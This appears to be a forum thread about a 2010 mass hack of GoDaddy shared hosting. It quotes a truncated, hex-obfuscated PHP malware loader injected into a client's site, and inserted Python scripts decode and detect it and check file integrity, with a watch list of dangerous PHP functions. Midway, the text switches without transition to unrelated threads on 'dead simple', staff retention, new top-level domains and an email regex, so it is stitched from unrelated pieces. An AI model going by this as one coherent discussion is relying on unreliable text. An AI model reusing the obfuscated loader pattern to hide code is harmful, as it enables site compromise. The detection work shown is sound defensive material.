
Another one of those "mass" attacks on GoDaddy started today.

The blog doesn't give any numbers, but it seems that a few of their shared servers were compromised, so a few thousand sites at least.

One of my clients still hosts there, and her files were all modified around 1pm today.

What I find unusual is the kind of code added to all PHP files:

" $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f.. \x6e";$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";.. $_8b7b1f56=$_8b7b("",$_8b7b1f("aWYoZnVuY.. "

If you decode that, it is an encoded "eval(base64_decode" to load the malware as hidden as possible.
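Added example (not code from the comment above or from any of the vendors it mentions): a small Python script that resolves the `\xHH` escapes in loaders like the one quoted, decodes as much of the base64 payload as the visible prefix allows, and flags PHP files that call a variable function resolved from hex escapes. The sample PHP is constructed from the visible part of the quoted snippet; because the snippet is truncated with "..", only its prefix (`aWYoZnVuY`, which decodes to `if(fun`) is used, and the real payload beyond that is unknown. The watch list of function names is an assumption about what commodity PHP malware typically obfuscates.

```python
import base64
import os
import re
import tempfile

# Functions that legitimate PHP almost never spells out as \xHH escapes
# (assumed watch list; extend to taste).
DANGEROUS = {"eval", "create_function", "base64_decode", "gzinflate",
             "gzuncompress", "str_rot13", "assert", "preg_replace",
             "system", "shell_exec", "passthru"}

HEX_ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})")
# $name = "\x..\x..";   a variable assigned a string built purely from hex escapes
HEX_ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*"((?:\\x[0-9a-fA-F]{2})+)"')
# $name(   a PHP variable function call
VAR_CALL_RE = re.compile(r"\$(\w+)\s*\(")
# a quoted base64-looking literal of at least 8 characters
B64_LITERAL_RE = re.compile(r'"([A-Za-z0-9+/]{8,}={0,2})"')

# Constructed sample modelled on the snippet quoted in the comment above.
# The quoted snippet is truncated (".."), so the payload here is only the
# visible prefix; the rest of the real payload is unknown.
SAMPLE_PHP = (
    r'<?php $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";'
    r'$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";'
    r'$_8b7b1f56=$_8b7b("",$_8b7b1f("aWYoZnVuY")); ?>'
)


def unescape_php_hex(s):
    """Resolve PHP double-quoted \\xHH escapes to the characters they encode."""
    return HEX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), s)


def decode_b64_prefix(blob):
    """Decode the longest unambiguous prefix of a possibly truncated base64 blob.

    A length of 1 mod 4 is never valid base64, and the last character of such
    a run only fixes the top six bits of the next byte, so it is dropped rather
    than guessed; shorter remainders are completed with '=' padding.
    """
    blob = blob.rstrip("=")
    if len(blob) % 4 == 1:
        blob = blob[:-1]
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("latin-1")


def analyze(src):
    """Describe what a hex-escaped PHP loader resolves to, without running it."""
    aliases = {var: unescape_php_hex(raw) for var, raw in HEX_ASSIGN_RE.findall(src)}
    called = [aliases[v] for v in VAR_CALL_RE.findall(src) if v in aliases]
    payloads = [decode_b64_prefix(b) for b in B64_LITERAL_RE.findall(src)]
    return {
        "aliases": aliases,        # variable -> real function name
        "called": called,          # resolved names actually invoked as $var(...)
        "payloads": payloads,      # decoded prefixes of base64 literals
        "injected": bool(set(called) & DANGEROUS),
    }


def scan_tree(root):
    """Return root-relative paths of .php files under root that analyze() flags."""
    flagged = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="latin-1") as fh:
                    if analyze(fh.read())["injected"]:
                        flagged.append(os.path.relpath(path, root).replace(os.sep, "/"))
    return sorted(flagged)


def demo_scan():
    """Write one injected and one clean file into a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "wp-content"))
        files = {
            "wp-content/index.php": SAMPLE_PHP,
            "clean.php": '<?php echo "hello"; ?>',
        }
        for rel, body in files.items():
            with open(os.path.join(root, rel), "w", encoding="latin-1") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    print(analyze(SAMPLE_PHP))
    print("flagged:", demo_scan())
```

On the quoted sample this resolves `$_8b7b` to `create_function` and `$_8b7b1f` to `base64_decode`, so the loader is `create_function("", base64_decode("if(func..."))`, an anonymous function built from the decoded payload. The scanner never executes the payload; it only reads files, which is the right posture on a box you already believe is compromised.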



For security monitoring: OSSEC (open source at ossec.net) and http://sucuri.net (paid external mon)


Duplicate of this one I sent hours ago, but it didn't get much love:

http://news.ycombinator.com/item?id=1807614


What a way to kill bit.ly and others....


I am definitely moving away from GoDaddy. I had some small sites on their shared servers that just got hacked again..

If you are not following, this is the 3rd mass hack at godaddy in just a few weeks:

http://smackdown.blogsblogsblogs.com/2010/05/13/hosting-with... http://blog.sucuri.net/2010/05/found-code-used-to-inject-mal...


Avoid Wordpress and shared hosts. They mention that all the sites hacked were on shared hosts.


Avoid Wordpress...really? I can understand avoiding shared hosts because you have less control of the environment but going to an alternative blogging platform because it is more obscure than Wordpress seems to be a bad approach (and if you go with a vps solution you might have the headaches of maintaining a secure distro). This is like saying "you should use Linux or Mac because Windows gets attacked more".

Any piece of software that is popular (I saw a recent statistic that wordpress powers 10% of the top 1 million sites as ranked by Alexa) will be much more vulnerable to attack than less popular software. At the same time, you get a bigger community and all the goodies that come along with that popularity (more plug-ins, themes, etc...).

I don't think that getting rid of the software is the correct approach in this case. You need to approach it by assuming that your wordpress site will be attacked every day and you need to have a plan to remediate this. There is no perfect security unless you unplug your web server from the internet. For a one blogger site - one simple approach would be to:

1. Run something like open source tripwire (http://sourceforge.net/projects/tripwire/) on a nightly basis so you can get alerted if any wordpress files get changed (HN peoplez: anyone have a better tripwire-ish solution that is free?)

2. Run a nightly backup of your files and db and mail it to an external account (like a gmail account)

3. Have a script that can reload your files and database quickly from your backups (obviously - this needs to be tested)

4. subscribe to the wordpress security list and to a blog like http://www.wpsecuritylock.com/blog/
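Added example, not from the comment above or from tripwire/AIDE: a minimal file-integrity check in Python of the kind you can run from a user cron job on a shared host where tripwire cannot be installed. It hashes the tracked files, stores the baseline with an HMAC keyed by a secret kept off the host (the key name and the site layout are constructed for the demo), and reports added, removed and modified files. The HMAC matters because an intruder who can rewrite every PHP file can usually rewrite a baseline stored beside them too.

```python
import hashlib
import hmac
import json
import os
import tempfile

# File types worth tracking on a PHP site (assumed list; add what you deploy).
TRACKED = (".php", ".htaccess", ".js", ".html")


def hash_tree(root):
    """Map each tracked file under root (path relative to root) to its SHA-256."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(TRACKED):
                continue
            path = os.path.join(dirpath, name)
            h = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(1 << 16), b""):
                    h.update(chunk)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            digests[rel] = h.hexdigest()
    return digests


def write_baseline(path, digests, key):
    """Store the digests with an HMAC so a baseline edited by an intruder is caught."""
    body = json.dumps(digests, sort_keys=True).encode()
    tag = hmac.new(key, body, hashlib.sha256).hexdigest()
    with open(path, "w") as fh:
        json.dump({"files": digests, "hmac": tag}, fh)


def read_baseline(path, key):
    """Load a baseline, refusing one whose HMAC does not verify under key."""
    with open(path) as fh:
        doc = json.load(fh)
    body = json.dumps(doc["files"], sort_keys=True).encode()
    expected = hmac.new(key, body, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, doc["hmac"]):
        raise ValueError("baseline HMAC mismatch: the baseline file was altered")
    return doc["files"]


def diff_baseline(old, new):
    """Classify paths as added, removed or modified between two digest maps."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }


def demo():
    """Baseline a constructed site, simulate a mass injection, and report."""
    key = b"constructed-demo-key"  # real key: kept off the web host, e.g. with the cron job
    loader = "<?php /* constructed stand-in for an injected loader */ ?>\n"
    with tempfile.TemporaryDirectory() as tmp:
        site = os.path.join(tmp, "site")
        os.makedirs(os.path.join(site, "wp-content"))
        originals = {
            "index.php": "<?php echo 'home'; ?>\n",
            "wp-content/plugin.php": "<?php function f() {} ?>\n",
            "readme.txt": "not tracked\n",
        }
        for rel, body in originals.items():
            with open(os.path.join(site, rel), "w") as fh:
                fh.write(body)
        baseline = os.path.join(tmp, "baseline.json")
        write_baseline(baseline, hash_tree(site), key)

        # The pattern from the thread: every PHP file gets the loader
        # prepended, and one new backdoor file appears.
        for rel in ("index.php", "wp-content/plugin.php"):
            path = os.path.join(site, rel)
            with open(path) as fh:
                body = fh.read()
            with open(path, "w") as fh:
                fh.write(loader + body)
        with open(os.path.join(site, "wp-content", "x.php"), "w") as fh:
            fh.write(loader)
        report = diff_baseline(read_baseline(baseline, key), hash_tree(site))

        # An intruder who can write the web root can overwrite the baseline
        # too; without the key the recomputed HMAC does not verify.
        write_baseline(baseline, hash_tree(site), b"attacker-does-not-know-key")
        try:
            read_baseline(baseline, key)
            tamper_detected = False
        except ValueError:
            tamper_detected = True
    return {"report": report, "tamper_detected": tamper_detected}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run `hash_tree` plus `write_baseline` once after a known-clean deploy (and again after each legitimate update), then `diff_baseline` nightly and mail the report; a non-empty "modified" list across every PHP file at once is exactly the signature of the mass injections described in this thread.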


I agree that Wordpress gets attacked more, and has more vulnerabilities uncovered, because it is popular. Unfortunately, that isn't the only reason. It is the same worst-of-both-worlds combination that WinXP SP 1 was in 2003.


You seriously sure Wordpress is at fault here?

http://wordpress.org/support/topic/396524#post-1506114


Infrequent bugs are a feature, they keep users from having to upgrade their software, which is annoying. That's why I avoid Wordpress.

I've never looked at the WP codebase, but I'm just flabbergasted that a piece of blogging software that's been around this long has so many holes. Anyone who just wants to run a simple blog with minimum hassle on a VPS is terribly ill served by Wordpress.


HN peoplez: anyone have a better tripwire-ish solution that is free?

AIDE - http://sourceforge.net/projects/aide/


Thanks!


I had to laugh when I read "dead simple". Someone complained about it on HN a few weeks ago and it is true. TechCrunch abuses this term too much..


Lately, I've been seeing "having said that, ..." or "that being said, ...", a little much in comments and blog posts. Having said that, I'm trying to avoid it myself.

Just noticed that jackowayed below has a variation of it in his comment.



Generally it goes to YC startups by default.


hehe, I only clicked on the comments for this thread because I wanted to see if someone would comment on "dead simple" again.


First time I can recall seeing "Dead Simple" is on Posterous. I think we're just used to everything being overly complicated so that anything that's simple is by definition "dead simple". Simple by itself is naked and unsophisticated. Dead simple on the other hand is special.


Well, our company has a good solution for this.

People leave because they get bored, so they would switch teams from time to time, give new responsibilities and try to keep everyone motivated. Didn't always work, but they managed to keep some top guys for very long...


I personally believe that "you will be given more challenging work" should be the reason to be given for documenting stuff, rather than "I know you will quit one day".

Not wanting to be interrupted, to know how things work, when you are working on your next interesting stuff, is reason enough to make things better maintainable.

I personally held that belief and worked through such challenges for over 8 years, until I got bored switching teams and creating new stuff for my employer. I now do the "creating new stuff" for myself at my startup.

If the talent is trying to make itself irreplaceable, say, only one person knows how something works and they do not like documenting it or training others, it shows the insecurity of a person who does not want to lose the job, which is bad for the organization as well as for the person.

Bad for the organization because, if the person either wants to quit or cannot turn up for work, a crucial piece of work cannot be completed.

Bad for the person because, though the person might think he/she is crucial for some piece of work and cannot be fired, they are tying themselves to that work and hence cannot be promoted to better opportunities.

A talent should learn and grow. And then to teach others and make them grow. And keep repeating the process. If there is not much you can learn to grow, then quit and join some place where you can.

This is from my first link to HN (545 days ago).. http://news.ycombinator.com/item?id=309262


Am I the only one who hates the idea of generic top-level domains? Will their web site be accessible just as http://.canon?


Yes, but it will redirect. It won't be canonical.


I see what you did there...


Looks like I accidentally ended up at Reddit...


There's nothing technical DNS-wise that would prevent the name 'canon' from resolving to an IP address, so http://canon could work. They could also add an MX record for the name 'canon' so @canon e-mail addresses would work too. Maybe ICANN has rules around gTLDs that would prevent this type of use?


I'm sure this will break a ridiculous number of regular expressions for email address validation.


Yes, but that is their own fault for trying to use a regex to validate email addresses. :)


(?:(?:\r\n)?[ \t])(?:(?:(?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t] )+|\Z|(?=[\["()<>@,;:\\".\[\]]))|"(?:[^\"\r\\]|\\.|(?:(?:\r\n)?[ \t]))"(?:(?: \r\n)?[ \t]))(?:\.(?:(?:\r\n)?[ \t])(?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:( ?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\".\[\]]))|"(?:[^\"\r\\]|\\.|(?:(?:\r\n)?[ \t]))"(?:(?:\r\n)?[ \t])))@(?:(?:\r\n)?[ \t])(?:[^()<>@,;:\\".\[\] \000-\0 31]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)\ ](?:(?:\r\n)?[ \t]))(?:\.(?:(?:\r\n)?[ \t])(?:[^()<>@,;:\\".\[\] \000-\031]+ (?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)\](?: (?:\r\n)?[ \t])))|(?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z |(?=[\["()<>@,;:\\".\[\]]))|"(?:[^\"\r\\]|\\.|(?:(?:\r\n)?[ \t]))"(?:(?:\r\n) ?[ \t]))\<(?:(?:\r\n)?[ \t])(?:@(?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\ r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)\](?:(?:\r\n)?[ \t]))(?:\.(?:(?:\r\n)?[ \t])(?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n) ?[ \t])+|\Z|(?=[\["()<>@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)\](?:(?:\r\n)?[ \t] )))(?:,@(?:(?:\r\n)?[ \t])(?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)\](?:(?:\r\n)?[ \t])* )(?:\.(?:(?:\r\n)?[ \t])(?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t] )+|\Z|(?=[\["()<>@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)\](?:(?:\r\n)?[ \t])))) :(?:(?:\r\n)?[ \t]))?(?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+ |\Z|(?=[\["()<>@,;:\\".\[\]]))|"(?:[^\"\r\\]|\\.|(?:(?:\r\n)?[ \t]))"(?:(?:\r \n)?[ \t]))(?:\.(?:(?:\r\n)?[ \t])(?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?: \r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\".\[\]]))|"(?:[^\"\r\\]|\\.|(?:(?:\r\n)?[ \t ]))"(?:(?:\r\n)?[ \t])))@(?:(?:\r\n)?[ \t])(?:[^()<>@,;:\\".\[\] \000-\031 ]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)\]( ?:(?:\r\n)?[ \t]))(?:\.(?:(?:\r\n)?[ \t])(?:[^()<>@,;:\\".\[\] \000-\031]+(? 
:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)\](?:(? :\r\n)?[ \t])))\>(?:(?:\r\n)?[ \t]))|(?:[^()<>@,;:\\".\[\] \000-\031]+(?:(? :(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\".\[\]]))|"(?:[^\"\r\\]|\\.|(?:(?:\r\n)? [ \t]))"(?:(?:\r\n)?[ \t])):(?:(?:\r\n)?[ \t])(?:(?:(?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\".\[\]]))|"(?:[^\"\r\\]| \\.|(?:(?:\r\n)?[ \t]))"(?:(?:\r\n)?[ \t]))(?:\.(?:(?:\r\n)?[ \t])(?:[^()<> @,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\".\[\]]))|" (?:[^\"\r\\]|\\.|(?:(?:\r\n)?[ \t]))"(?:(?:\r\n)?[ \t])))@(?:(?:\r\n)?[ \t] )(?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\ ".\[\]]))|\[([^\[\]\r\\]|\\.)\](?:(?:\r\n)?[ \t]))(?:\.(?:(?:\r\n)?[ \t])(? :[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\".\[ \]]))|\[([^\[\]\r\\]|\\.)\](?:(?:\r\n)?[ \t])))|(?:[^()<>@,;:\\".\[\] \000- \031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\".\[\]]))|"(?:[^\"\r\\]|\\.|( ?:(?:\r\n)?[ \t]))"(?:(?:\r\n)?[ \t]))\<(?:(?:\r\n)?[ \t])(?:@(?:[^()<>@,; :\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\".\[\]]))|\[([ ^\[\]\r\\]|\\.)\](?:(?:\r\n)?[ \t]))(?:\.(?:(?:\r\n)?[ \t])(?:[^()<>@,;:\\" .\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\".\[\]]))|\[([^\[\ ]\r\\]|\\.)\](?:(?:\r\n)?[ \t])))(?:,@(?:(?:\r\n)?[ \t])(?:[^()<>@,;:\\".\ [\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\".\[\]]))|\[([^\[\]\ r\\]|\\.)\](?:(?:\r\n)?[ \t]))(?:\.(?:(?:\r\n)?[ \t])(?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\".\[\]]))|\[([^\[\]\r\\] |\\.)\](?:(?:\r\n)?[ \t])))):(?:(?:\r\n)?[ \t]))?(?:[^()<>@,;:\\".\[\] \0 00-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\".\[\]]))|"(?:[^\"\r\\]|\\ .|(?:(?:\r\n)?[ \t]))"(?:(?:\r\n)?[ \t]))(?:\.(?:(?:\r\n)?[ \t])(?:[^()<>@, ;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\".\[\]]))|"(? 
:[^\"\r\\]|\\.|(?:(?:\r\n)?[ \t]))"(?:(?:\r\n)?[ \t])))@(?:(?:\r\n)?[ \t])* (?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\". \[\]]))|\[([^\[\]\r\\]|\\.)\](?:(?:\r\n)?[ \t]))(?:\.(?:(?:\r\n)?[ \t])(?:[ ^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\".\[\] ]))|\[([^\[\]\r\\]|\\.)\](?:(?:\r\n)?[ \t])))\>(?:(?:\r\n)?[ \t]))(?:,\s( ?:(?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\ ".\[\]]))|"(?:[^\"\r\\]|\\.|(?:(?:\r\n)?[ \t]))"(?:(?:\r\n)?[ \t]))(?:\.(?:( ?:\r\n)?[ \t])(?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[ \["()<>@,;:\\".\[\]]))|"(?:[^\"\r\\]|\\.|(?:(?:\r\n)?[ \t]))"(?:(?:\r\n)?[ \t ])))@(?:(?:\r\n)?[ \t])(?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t ])+|\Z|(?=[\["()<>@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)\](?:(?:\r\n)?[ \t]))(? :\.(?:(?:\r\n)?[ \t])(?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+| \Z|(?=[\["()<>@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)\](?:(?:\r\n)?[ \t])))|(?: [^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\".\[\ ]]))|"(?:[^\"\r\\]|\\.|(?:(?:\r\n)?[ \t]))"(?:(?:\r\n)?[ \t]))\<(?:(?:\r\n) ?[ \t])(?:@(?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\[" ()<>@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)\](?:(?:\r\n)?[ \t]))(?:\.(?:(?:\r\n) ?[ \t])(?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<> @,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)\](?:(?:\r\n)?[ \t])))(?:,@(?:(?:\r\n)?[ \t])(?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@, ;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)\](?:(?:\r\n)?[ \t]))(?:\.(?:(?:\r\n)?[ \t] )(?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\ ".\[\]]))|\[([^\[\]\r\\]|\\.)\](?:(?:\r\n)?[ \t])))):(?:(?:\r\n)?[ \t]))? (?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:\\". 
\[\]]))|"(?:[^\"\r\\]|\\.|(?:(?:\r\n)?[ \t]))"(?:(?:\r\n)?[ \t]))(?:\.(?:(?: \r\n)?[ \t])(?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\[ "()<>@,;:\\".\[\]]))|"(?:[^\"\r\\]|\\.|(?:(?:\r\n)?[ \t]))"(?:(?:\r\n)?[ \t]) ))@(?:(?:\r\n)?[ \t])(?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t]) +|\Z|(?=[\["()<>@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)\](?:(?:\r\n)?[ \t]))(?:\ .(?:(?:\r\n)?[ \t])(?:[^()<>@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z |(?=[\["()<>@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)\](?:(?:\r\n)?[ \t])))\>(?:( ?:\r\n)?[ \t]))))?;\s)


I wish people would stop posting that. Yes, that covers most (though not all) of the RFC definitions of what constitutes an email address, but in practice you only want to accept a tiny subset of those.


Curious: Why would you want to accept only a tiny subset of those? What do you gain by that?


Well, the really simple example is the string "postmaster". It is a perfectly legitimate email address, and almost always deliverable. But rarely something you want to actually accept.


Regardless of the rules, there are a few TLDs that route mail and resolve to websites. http://to./ comes to mind, but there are a few others.


http://canon./, rather. Like http://to./

Most lesser-known TLDs with a central registrar already do this by giving themselves the www.TLD. record; for example http://www.tv/ or http://www.name/. When you try just "tv./" or "name./" in your browser, it'll try those as well, without having to muddy up the main record.


I thought the dot was a separator. Why do we have to have one at all? Why shouldn't the canonical URL be http://cannon/ ?


http://canon/ would refer to whatever canon was local to your gateway's DNS host record (I believe; I can't find the exact term for it.) For example, my computer is d207-6-247-238.bchsia.telus.net. If I type "canon" into anything that calls gethostbyname(), it assumes I mean canon.bchsia.telus.net. When that doesn't resolve, then it tries "canon."

http://canon./, on the other hand, refers to the "canon" that is located at the "root directory" of the internet—that is, ".". Most addresses don't need this, because once you specify any more than a host name, it assumes the rest of the domain "path" is a fully-qualified DNS record, and doesn't bother checking your local network for it.
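Added example, not from the comment above: a Python model of the search-list rule the comment describes, so you can see why `canon` and `canon.` are different queries. It assumes glibc stub-resolver semantics from resolv.conf(5) (search domains appended to names with fewer than `ndots` dots, default 1, then the bare name tried as absolute); the zone records and addresses are constructed, using the commenter's `bchsia.telus.net` search domain and documentation IP ranges.

```python
# Assumption: models the glibc stub resolver's search-list rules from
# resolv.conf(5) with the default ndots=1. Other resolvers differ in details.


def is_absolute(name):
    """A trailing dot pins the name to the DNS root; nothing gets appended."""
    return name.endswith(".")


def resolution_candidates(name, search_domains, ndots=1):
    """Fully qualified names a stub resolver tries for `name`, in order.

    'canon.'    is absolute: only the root-level name is tried.
    'canon'     has fewer than ndots dots: each search domain is appended
                first, and the bare name is tried last.
    'www.canon' has enough dots: it is tried as-is first, then with the
                search domains appended.
    """
    if is_absolute(name):
        return [name]
    absolute = name + "."
    searched = [f"{name}.{d.strip('.')}." for d in search_domains]
    if name.count(".") < ndots:
        return searched + [absolute]
    return [absolute] + searched


def resolve(name, records, search_domains, ndots=1):
    """Return (fqdn, address) for the first candidate present in `records`, else None."""
    for fqdn in resolution_candidates(name, search_domains, ndots):
        if fqdn in records:
            return fqdn, records[fqdn]
    return None


# Constructed zone data: a hypothetical apex record for a 'canon' TLD and an
# unrelated host that happens to be called 'canon' inside the commenter's
# search domain. Addresses are from documentation ranges, not real ones.
RECORDS = {
    "canon.": "198.51.100.10",
    "canon.bchsia.telus.net.": "192.0.2.7",
}
SEARCH = ["bchsia.telus.net"]

if __name__ == "__main__":
    for query in ("canon", "canon.", "www.canon"):
        print(query, "->", resolution_candidates(query, SEARCH), resolve(query, RECORDS, SEARCH))
    print("no search domain:", resolve("canon", RECORDS, []))
```

With a search domain set, `canon` lands on the local host `canon.bchsia.telus.net.` and never reaches the TLD apex, while `canon.` goes straight to the root; with no search domain (the case mentioned further down the thread) the bare name resolves at the root. The same shadowing is why an unqualified name is a poor identifier in anything security-sensitive: whoever controls a host of that name inside the client's search domain wins the lookup.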


I don't hate it, indeed I like the idea of .anigbrowl or so :-) I think domain names themselves are transient; in recent years I find myself doing things like searching for 'Canon camera' and letting Chrome and Google take care of the routing.

This post automatically generated by Google.com in response to inarticulate mumblings by user anigbrowl


Actually http://canon./ (http://canon/ would also work in rare cases (No DNS search domain set and the browser also doesn't try to interpret it as a keyword.))


It's a domain squatter's dream come true.


Or is the end (eventually) for the squatting game? When there are hundreds or thousands of alternatives for xyz.com, won't that seriously diminish the worth of any one in particular?


Doesn't matter. Most will be found by Google search.


It is not a domain squatter's dream come true, it is the DNS bureaucracy cabal's dream come true.

It has little value for users/consumers (i.e., won't remember if they want canon.com or canon.canon). It has little value for businesses, because it means more time and money monitoring for domain squatting and trademark infringement. It provides yet another playing field for scammers and other predators.

The only benefit is to the upper levels in the DNS hierarchy; it gives them more revenue to perpetuate themselves and to come up with more user-hostile ideas.


I agree, and as I said, it really doesn't matter. The vast majority of people are going to get what they need through Google, and to a lesser extent, the other search engines.


It has little value for users/consumers (i.e., won't remember if they want canon.com or canon.canon).

Actually if you buy an arbitrary top level domain, there will be no more .com.

Instead it will be .google, .apple or .hackernews


You have to pay ICANN hundreds of thousands of dollars to get one of these new gTLDs. Domain squatters will not be allowed.


No you're not. I'm still getting over the trauma of .info, .tv et al.

